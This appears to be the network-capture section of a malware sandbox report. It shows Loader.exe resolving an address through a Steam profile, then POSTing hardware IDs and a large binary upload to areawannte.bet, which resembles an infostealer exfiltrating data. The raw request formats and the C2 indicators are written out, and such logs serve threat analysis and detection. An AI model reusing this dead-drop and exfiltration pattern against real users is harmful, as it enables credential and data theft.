Timestamp	Bytes transferred	Direction	Data
2025-03-11 00:14:08 UTC	94	OUT	GET /profiles/76561199822375128 HTTP/1.1 Connection: Keep-Alive Host: steamcommunity.com
2025-03-11 00:14:09 UTC	1962	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 11 Mar 2025 00:14:09 GMT Content-Length: 35725 Connection: close Set-Cookie: sessionid=641fc8f04b21c75d29934868; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C1dd948cd7ff32d9bbd82fbd59380fba0; path=/; secure; HttpOnly; SameSite=None
2025-03-11 00:14:09 UTC	14422	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-11 00:14:09 UTC	10154	IN	Data Raw: 79 70 65 3d 22 73 65 6c 65 63 74 6f 72 22 20 64 61 74 61 2d 74 6f 6f 6c 74 69 70 2d 63 6f 6e 74 65 6e 74 3d 22 2e 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 43 4f 4d 4d 55 4e 49 54 59 09 09 09 3c 2f 61 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 20 64 61 74 61 2d 73 75 62 6d 65 6e 75 69 64 3d 22 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 22 3e 0a 09 09 09 09 09 09 48 6f 6d 65 09 09 09 09 09 09 09 09 Data Ascii: ype="selector" data-tooltip-content=".submenu_Community">COMMUNITY</a><div class="submenu_Community" style="display: none;" data-submenuid="Community"><a class="submenuitem" href="https://steamcommunity.com/">Home
2025-03-11 00:14:09 UTC	11149	IN	Data Raw: 75 6f 74 3b 45 52 45 41 4c 4d 26 71 75 6f 74 3b 3a 31 2c 26 71 75 6f 74 3b 4c 4f 47 49 4e 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 6c 6f 67 69 6e 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 41 56 41 54 41 52 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 61 76 61 74 61 72 73 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 46 52 4f 4d 5f 57 45 42 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 57 45 42 53 49 54 45 5f 49 44 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 43 6f 6d 6d 75 6e 69 74 79 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 42 41 Data Ascii: uot;EREALM":1,"LOGIN_BASE_URL":"https:\/\/login.steampowered.com\/","AVATAR_BASE_URL":"https:\/\/avatars.fastly.steamstatic.com\/","FROM_WEB":true,"WEBSITE_ID":"Community","BA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49708	188.114.96.3	443	7660	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 00:14:11 UTC	276	OUT	POST /aRIsjI HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0Ds1NLRBlGda User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 2640 Host: areawannte.bet
2025-03-11 00:14:11 UTC	2640	OUT	Data Raw: 2d 2d 30 44 73 31 4e 4c 52 42 6c 47 64 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 38 36 36 66 63 62 64 30 34 33 33 30 61 38 63 61 31 33 37 37 34 66 30 66 62 31 34 66 35 63 39 33 30 62 32 66 39 30 32 36 37 36 37 37 31 62 61 61 31 38 65 30 0d 0a 2d 2d 30 44 73 31 4e 4c 52 42 6c 47 64 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 44 73 31 4e 4c 52 42 6c 47 64 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 42 31 31 39 43 30 39 32 41 Data Ascii: --0Ds1NLRBlGdaContent-Disposition: form-data; name="uid"866fcbd04330a8ca13774f0fb14f5c930b2f902676771baa18e0--0Ds1NLRBlGdaContent-Disposition: form-data; name="pid"1--0Ds1NLRBlGdaContent-Disposition: form-data; name="hwid"1BB119C092A
2025-03-11 00:14:12 UTC	818	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 00:14:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6repM5jZZf9qvH31iEoBzdxjqwBiiLwweQXeuH1D%2B9qn8Xfgzm3jnw6w%2F0AzetDGAPsP29UI%2BDfJ8s3URMxhZQxxezFAxX4%2BzmHIIMgzmZWfWNw88MF5dBscBt7k7wlWuQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e6d9a9f85e3d59-JAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=25284&min_rtt=15079&rtt_var=12944&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2831&recv_bytes=3552&delivery_rate=192055&cwnd=251&unsent_bytes=0&cid=335d178ff9edae57&ts=933&x=0"
2025-03-11 00:14:12 UTC	74	IN	Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 32 31 2e 31 30 31 2e 31 30 22 7d 7d 0d 0a Data Ascii: 44{"success":{"message":"message success delivery from 73.21.101.10"}}
2025-03-11 00:14:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49710	92.122.104.90	443	7660	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 00:14:14 UTC	94	OUT	GET /profiles/76561199822375128 HTTP/1.1 Connection: Keep-Alive Host: steamcommunity.com
2025-03-11 00:14:15 UTC	1962	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 11 Mar 2025 00:14:15 GMT Content-Length: 35725 Connection: close Set-Cookie: sessionid=a7af2b6f248ea375b99b2be6; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C1dd948cd7ff32d9bbd82fbd59380fba0; path=/; secure; HttpOnly; SameSite=None
2025-03-11 00:14:15 UTC	14422	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-11 00:14:15 UTC	10154	IN	Data Raw: 79 70 65 3d 22 73 65 6c 65 63 74 6f 72 22 20 64 61 74 61 2d 74 6f 6f 6c 74 69 70 2d 63 6f 6e 74 65 6e 74 3d 22 2e 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 43 4f 4d 4d 55 4e 49 54 59 09 09 09 3c 2f 61 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 20 64 61 74 61 2d 73 75 62 6d 65 6e 75 69 64 3d 22 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 22 3e 0a 09 09 09 09 09 09 48 6f 6d 65 09 09 09 09 09 09 09 09 Data Ascii: ype="selector" data-tooltip-content=".submenu_Community">COMMUNITY</a><div class="submenu_Community" style="display: none;" data-submenuid="Community"><a class="submenuitem" href="https://steamcommunity.com/">Home
2025-03-11 00:14:15 UTC	11149	IN	Data Raw: 75 6f 74 3b 45 52 45 41 4c 4d 26 71 75 6f 74 3b 3a 31 2c 26 71 75 6f 74 3b 4c 4f 47 49 4e 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 6c 6f 67 69 6e 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 41 56 41 54 41 52 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 61 76 61 74 61 72 73 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 46 52 4f 4d 5f 57 45 42 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 57 45 42 53 49 54 45 5f 49 44 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 43 6f 6d 6d 75 6e 69 74 79 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 42 41 Data Ascii: uot;EREALM":1,"LOGIN_BASE_URL":"https:\/\/login.steampowered.com\/","AVATAR_BASE_URL":"https:\/\/avatars.fastly.steamstatic.com\/","FROM_WEB":true,"WEBSITE_ID":"Community","BA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49711	188.114.96.3	443	7660	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 00:14:17 UTC	277	OUT	POST /aRIsjI HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0f4X3ec4wyn User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 588032 Host: areawannte.bet
2025-03-11 00:14:17 UTC	15331	OUT	Data Raw: 2d 2d 30 66 34 58 33 65 63 34 77 79 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 38 36 36 66 63 62 64 30 34 33 33 30 61 38 63 61 31 33 37 37 34 66 30 66 62 31 34 66 35 63 39 33 30 62 32 66 39 30 32 36 37 36 37 37 31 62 61 61 31 38 65 30 0d 0a 2d 2d 30 66 34 58 33 65 63 34 77 79 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 66 34 58 33 65 63 34 77 79 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 42 31 31 39 43 30 39 32 41 35 41 41 Data Ascii: --0f4X3ec4wynContent-Disposition: form-data; name="uid"866fcbd04330a8ca13774f0fb14f5c930b2f902676771baa18e0--0f4X3ec4wynContent-Disposition: form-data; name="pid"1--0f4X3ec4wynContent-Disposition: form-data; name="hwid"1BB119C092A5AA
2025-03-11 00:14:17 UTC	15331	OUT	Data Raw: d1 57 f7 47 3c 85 94 82 e1 a6 bf 03 58 ef 91 95 f7 65 b9 9d 29 bf af 84 cb aa 6a 6e 7a de e0 b2 87 91 ba 33 93 65 81 b6 14 7d 65 5e 80 45 16 fc e4 aa d5 61 a6 2d 93 4a 08 8a 09 c0 b0 c8 8e c9 80 98 28 26 9c 3d f2 04 97 9c 13 7c 78 34 ba 95 1f e4 af 20 9a 88 d9 04 9c 8c 26 1e 14 33 56 6c 7f 9e 6d 2a 38 7c 29 41 2e e8 6f 1b b4 da 5e 04 1e 84 4b ff 13 b6 7f 66 0f 5a fa 6c d0 d5 a9 2b cd 74 e8 3a 94 37 76 91 65 1a 0a 92 41 9e c1 5f e4 cf ab 07 51 3f 27 e3 13 4f ef fb 2f bc d0 06 f5 32 86 20 7e 73 d2 46 01 55 fa 60 5d 13 03 49 2b e6 2c f5 da f4 b1 27 2e 23 ab eb fb 74 79 9e db 21 c0 48 8c 45 0f bf 81 7f 5f 69 aa 3c a6 9f 15 35 76 61 aa 5b 19 a4 74 ec 67 70 cb e3 b7 6f 23 37 96 e9 76 96 ad 92 b0 64 05 b9 de cb a2 a9 96 a8 52 45 0a 08 57 52 93 fc db 9a f6 c3 ef Data Ascii: WG<Xe)jnz3e}e^Ea-J(&=\|x4 &3Vlm*8\|)A.o^KfZl+t:7veA_Q?'O/2 ~sFU`]I+,'.#ty!HE_i<5va[tgpo#7vdREWR
2025-03-11 00:14:17 UTC	15331	OUT	Data Raw: 01 a2 14 d4 e6 9c 3f d1 ff 1b 67 4a fe 99 ba c3 4b bc 17 ff 3c 62 6e 0c dc b3 38 ba 83 73 72 43 4f 10 68 63 b2 89 75 16 10 f0 48 dd c0 79 56 a5 12 07 6d 90 c6 3d 09 11 61 37 df 56 93 7a bd 32 30 fa 36 c6 e9 15 c2 c1 f5 22 65 32 66 dc d9 25 88 79 95 63 f8 a2 a0 30 cd 79 32 a3 bf 0b 0c 62 41 43 f7 1a b4 d3 18 2a 09 bb 4f 42 20 b4 a0 4f d2 70 b0 1e c3 5d 53 e8 5e 93 94 b0 41 4f 70 27 28 2e 15 a5 c2 d2 13 86 68 95 e9 d6 b5 be a6 f8 6a 72 3e a9 89 0c 90 e8 1c ab e5 54 84 57 e3 3c d8 3b 1d 47 a5 b9 25 55 02 df 24 fe 9e 7b 0e 2e 77 52 88 c1 9d d1 d3 98 82 5a 6a 60 63 4a 5c c0 32 9f fb b7 37 83 75 dd 26 1b 04 3f 6c 41 1c 88 c1 28 e9 0f 15 d7 36 58 af 68 71 7a 28 2e 33 fb e4 25 f8 12 49 a3 f8 89 03 c2 9f a6 43 68 99 7f b8 c1 8d 3d cb 17 bc 67 ce ba 7f 81 c6 74 08 Data Ascii: ?gJK<bn8srCOhcuHyVm=a7Vz206"e2f%yc0y2bAC*OB Op]S^AOp'(.hjr>TW<;G%U${.wRZj`cJ\27u&?lA(6Xhqz(.3%ICh=gt
2025-03-11 00:14:17 UTC	15331	OUT	Data Raw: 49 ac 44 1a 8a 9e 00 f0 fa f6 82 39 ad da 44 60 55 63 03 9d 73 02 10 f0 2b bd f3 a8 31 44 8a b5 9d 5d 82 63 b2 d1 88 d9 52 f0 73 17 b5 61 3b bf 8e 63 d2 5e 71 f5 5f da f3 c9 da 41 50 4e 55 b5 21 7a 3b f9 b4 c0 a5 66 d9 34 5f 24 85 a8 fd 24 d8 e3 7b db ac 23 0e e5 ba f8 40 39 1c 12 7a 55 5e a6 17 84 dc 38 75 3a ca 72 1a 93 0f ef 70 4a 32 8c 7d d0 c4 ec 24 04 83 96 61 11 37 80 0f db fd d0 24 72 36 d2 57 f1 16 27 ff c8 e1 03 ab aa 79 63 8c 18 d6 2f c6 3f dd cf d4 94 bc 52 e5 70 dc 9d 31 0c b5 5a 87 d0 97 a2 07 cf 94 e1 7d f1 e3 0d 16 ca 77 3d 81 ec 2d 4a d3 67 ed 64 55 1e 1c 7c 9b 28 e2 e3 b1 4d 4b 30 56 e7 85 4f f3 fc b2 17 28 43 6e aa 32 76 43 02 f0 67 f9 0d fb 7e 81 d3 6a cb f0 c2 6a af 26 f0 8f 8e 8a 77 1f b0 a7 af 54 b5 97 38 69 be e1 f4 a3 bb 7f 9f 3c Data Ascii: ID9D`Ucs+1D]cRsa;c^q_APNU!z;f4_$${#@9zU^8u:rpJ2}$a7$r6W'yc/?Rp1Z}w=-JgdU\|(MK0VO(Cn2vCg~jj&wT8i<
2025-03-11 00:14:17 UTC	15331	OUT	Data Raw: 52 06 22 54 5d 80 15 c0 c7 8e d0 73 5a 25 5a 59 a1 8b b5 5d 9a bd c3 3c e3 f1 18 8c e2 b9 a2 30 64 f4 0c 2a e3 24 92 4f e1 3f 4e f5 b2 0c 30 23 57 56 80 8f 97 ae fd 1a 12 3d 4e 31 02 30 af 0f 6d 7c 5b 14 1a b6 dd 2e da 84 2a d5 a2 ae a7 fa 3b 06 fc 45 07 b7 f5 1c c3 3f 07 68 83 70 4e 7d 79 13 4b 0d 74 ff 99 3a b8 8c 3f f3 ee e4 95 f0 19 21 e2 6b 2d 5d a7 2f 24 26 05 d9 95 b0 c9 3c bd 13 43 48 ff 1a 60 f3 fc 55 11 3f 8f c7 c6 65 5f f1 50 23 9a 09 c9 f9 6f e7 c3 9f 54 aa 90 08 61 32 69 9e 91 28 2a 5f 57 8c 35 46 a3 43 0e f2 e9 73 32 83 1f a9 d6 07 62 3b d0 9a c1 87 c1 44 8b 33 d2 ff 64 5f cd e9 f6 53 ed 05 30 ae de 01 da f5 63 e4 f8 1a ed d1 e2 5e a1 07 59 0d 67 af d3 e3 8d 2a 91 c1 1c ee 32 e2 00 73 3d 69 88 71 ba 68 ae 3f 02 7a c3 13 85 22 9d 3b 02 40 9b Data Ascii: R"T]sZ%ZY]<0d$O?N0#WV=N10m\|[.;E?hpN}yKt:?!k-]/$&<CH`U?e_P#oTa2i(_W5FCs2b;D3d_S0c^Yg2s=iqh?z";@
2025-03-11 00:14:17 UTC	15331	OUT	Data Raw: f3 1d 8b 96 97 69 c4 31 68 93 8a 98 54 da 75 ca a3 ef e6 10 80 70 f7 90 80 15 22 0b 4e 9f c1 34 28 ca c7 1f b2 9d fc c0 61 bd a1 c9 cf ed ee ec a1 90 ba 28 13 2b b6 af d3 67 79 35 ec dc f2 cf 79 44 1f ef ff a1 50 64 8c 55 49 87 8e 3e 92 61 84 18 be 8b 82 56 23 b8 08 53 bf 0f 3d eb 9c df 23 4c e1 47 19 77 bc ad bd 45 62 8b e9 64 48 5d 8f 9d 6f dc 0b 03 aa 55 4d da c5 26 6f 77 6a eb 9e af fd 0d a4 8b ae 51 cb 9e 96 0c 8d b6 ec 31 12 a0 2c e4 7d 16 65 f4 5e 5c ad f2 66 ea e4 7a 9f 95 18 9d 3d d0 d0 a7 7a 7a 2f eb 3b 6f fc ce 5f e2 2b 92 76 2b ea 9d fd d1 70 5d bc 47 38 b8 a9 e8 ba a5 08 9e 8c 7f 7b 0b 8b b8 38 3b 9d 2e c1 87 c5 99 c8 ad 48 4b 13 9b 72 50 d4 56 dc a9 57 21 72 78 56 8b 8a 7d 9a a1 c9 1c ac 4b 67 c9 9e 28 a3 95 31 6a 2d 16 5c 4a 52 c5 d2 19 3a Data Ascii: i1hTup"N4(a(+gy5yDPdUI>aV#S=#LGwEbdH]oUM&owjQ1,}e^\fz=zz/;o_+v+p]G8{8;.HKrPVW!rxV}Kg(1j-\JR:
2025-03-11 00:14:17 UTC	15331	OUT	Data Raw: 45 fb b5 6e c2 a2 3e a2 3e ed ab d9 73 0d 63 11 b4 f9 a4 ad c8 25 4d b3 2f df ca fe ea 61 0a 44 3d 27 83 b4 ae 25 6d d1 9e 00 f6 be fd 3c 0d fb 85 29 5b e0 1b ab 73 21 90 3e 56 48 2e 22 da 75 a2 ed 64 69 39 86 01 13 db e2 56 2f 6f 2a 5f 9b 0c 3d 99 59 87 89 dd b5 b4 f7 43 24 4d f7 9a df 75 8c 0a c6 72 90 82 2a 22 89 30 f0 46 42 b2 9a 87 a4 c6 84 02 5d 6b 9c c6 b4 a3 86 96 9f b7 6f 89 06 5c ec f4 9c d5 8e 6b ba a9 83 21 2f 7f a7 a6 25 f3 75 0b 25 74 5f df 97 3f bd d9 19 93 68 8d 9d 59 d2 a8 4c e5 3a cd f9 dc 5b 78 69 13 19 3a ec 47 c9 38 0f 95 9b df a7 ef 7f 2b 29 03 0a 56 fa d1 6f a7 c0 01 06 b5 ad 2e 48 4d 5e ca fe c6 31 00 1f c1 2b 20 f1 23 a5 9e 4e be b6 c0 42 dd 4a f7 aa 3b 32 99 20 f0 2c b9 11 d7 e4 9c be 16 da 76 37 d1 23 77 b6 35 ca 4c 95 d5 8c 57 Data Ascii: En>>sc%M/aD='%m<)[s!>VH."udi9V/o_=YC$Mur"0FB]ko\k!/%u%t_?hYL:[xi:G8+)Vo.HM^1+ #NBJ;2 ,v7#w5LW
2025-03-11 00:14:17 UTC	15331	OUT	Data Raw: 70 03 74 69 46 90 5b f2 f2 99 da aa de 1f 70 d6 5e 09 52 40 da 7c 95 89 69 cc 59 de 2a 07 5c 59 69 01 7c 52 57 c6 21 d7 1f b0 81 db 61 56 e2 f9 e2 da 98 b8 65 2b 5f 9d 3e 17 90 e6 e6 4e 34 99 fd 80 91 2b 8b e3 f5 38 81 cb c1 d6 9e b8 7c 7f 09 a4 a7 a2 67 fa be 3a 2e 58 13 9f 8e 5f ce 27 ba 03 1c d8 41 ad 1e ca 8d 72 1e 73 3a 68 97 0f 3c f2 69 af 1d ea b2 39 54 94 3b 4f b5 24 a8 86 67 d4 fb 77 3b e9 65 a9 cd cf 1a 30 0c 4a 10 8e e7 ae d9 39 fa eb 6a 5d c2 93 07 aa 22 6d 74 22 02 90 7f ec 09 fb 45 1a 0b fd 2e fa 8e 28 97 59 7e 56 d0 5c d1 87 8a 69 4a ca 28 79 1e 6d 3b 44 b7 3e 4a 35 26 6b c1 a7 17 bf ab 3b 12 f3 88 35 99 27 57 39 70 5f 24 66 a1 3c d6 02 1f 07 6f 56 e4 92 d7 03 aa a8 7c 61 de 72 0d 07 1e 59 8c 0a 69 18 20 22 c7 1a 41 fe 7d 70 37 bf 32 76 bf Data Ascii: ptiF[p^R@\|iY*\Yi\|RW!aVe+_>N4+8\|g:.X_'Ars:h<i9T;O$gw;e0J9j]"mt"E.(Y~V\iJ(ym;D>J5&k;5'W9p_$f<oV\|arYi "A}p72v
2025-03-11 00:14:17 UTC	15331	OUT	Data Raw: 32 c7 d0 60 0b 70 a3 16 0f ae 5f 9a b4 f1 ad b6 78 1a 0c 7a ab 57 e3 03 9c a7 5d 0d 16 ef 6b 0a ed 7b 8b 4e 3f 81 ed 8a 80 cf 7e 1e c4 1b 3e c3 92 5b 77 c6 33 66 11 c6 ed bf 9e 91 1c 2d 77 4b 7c 4e 81 05 3d f2 3b be 45 58 c5 76 1f 91 ea 00 81 6b 12 4f ba 8f f4 40 fa cb 6e a8 0f b2 6e 70 9c 05 f0 6d 01 b4 90 20 6c 61 53 24 14 8e ce 95 4d ee 0f 44 d3 b5 53 09 72 8f ee 21 da bf 00 aa cd bd 1b 8c 5c 96 08 d6 5d 36 a6 49 ef 8d ac f3 e5 ef 3d 40 97 44 ac c9 c2 e2 a0 03 81 5c dd 06 94 18 b1 22 86 6d 0d 48 bb 6d 52 9e 1c 0e 7b 93 f8 ca 94 78 6e 56 b8 d3 10 a9 51 e2 61 16 1d b0 2d 5c 43 20 fb e5 0c 5f 64 19 54 34 8e 82 96 95 2f c4 42 98 ef d6 30 ce 72 c3 16 0f 0e e8 09 70 a9 cb a5 93 af 3f ae 2f 4b 60 69 53 7f 5b 45 64 c2 47 45 fe 31 96 c9 f1 f5 f3 9b e0 36 3f 6a Data Ascii: 